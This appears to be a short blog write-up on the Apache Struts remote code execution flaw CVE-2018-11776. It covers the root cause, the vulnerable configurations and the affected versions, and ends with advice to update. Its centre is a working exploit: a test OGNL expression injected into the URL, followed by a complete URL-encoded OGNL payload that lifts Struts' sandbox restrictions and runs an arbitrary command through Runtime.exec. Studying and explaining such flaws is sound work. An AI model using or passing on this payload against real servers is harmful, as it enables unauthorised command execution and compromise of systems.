CVE-2018–11776 Apache Struts vulnerability explanation
What is Apache struts?
Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model–view–controller (MVC) architecture.
What is root cause of vulnerability?
The root cause was a lack of input validation on the URL passed to the Struts framework.
Let’s begin,
First visit http://ip:port/struts2-showcase
As I have said, root cause of the vulnerability is lack of input validation. So here, I have tried to inject payload with url encode. I have entered {444*333} with url encode `%7B444*333%7D` with $ sign.
http://ip:port/struts2 showcase/$%7B444*333%7D/actionChain1.action
You will get the response of the multiplication of number. Here, you will on which parameter is vulnerable and how to send a request.
http://ip:port/struts2-showcase/147852/actionChain1.action
Now, as in CVE mentioned that apache struts vulnerable to remote code execution. Here we found on which link and parameter is vulnerable. So we can apply a payload that will give the remote code execution.
/struts2 -showcase/$%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('executecommand')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action
Who is Vulnerable?
- The alwaysSelectFullNamespace flag setting is set to true in the Struts configuration.
- The Struts configuration file contains an <action …> tag that does not specify either the optional namespace attribute or a wildcard namespace.
Impacted Version.
The impacted versions are Struts 2.3 — Struts 2.3.34 and Struts 2.5 — Struts 2.5.16 of the Apache Struts framework. If you are currently running an affected version highly recommended to update.
Video Proof of concept
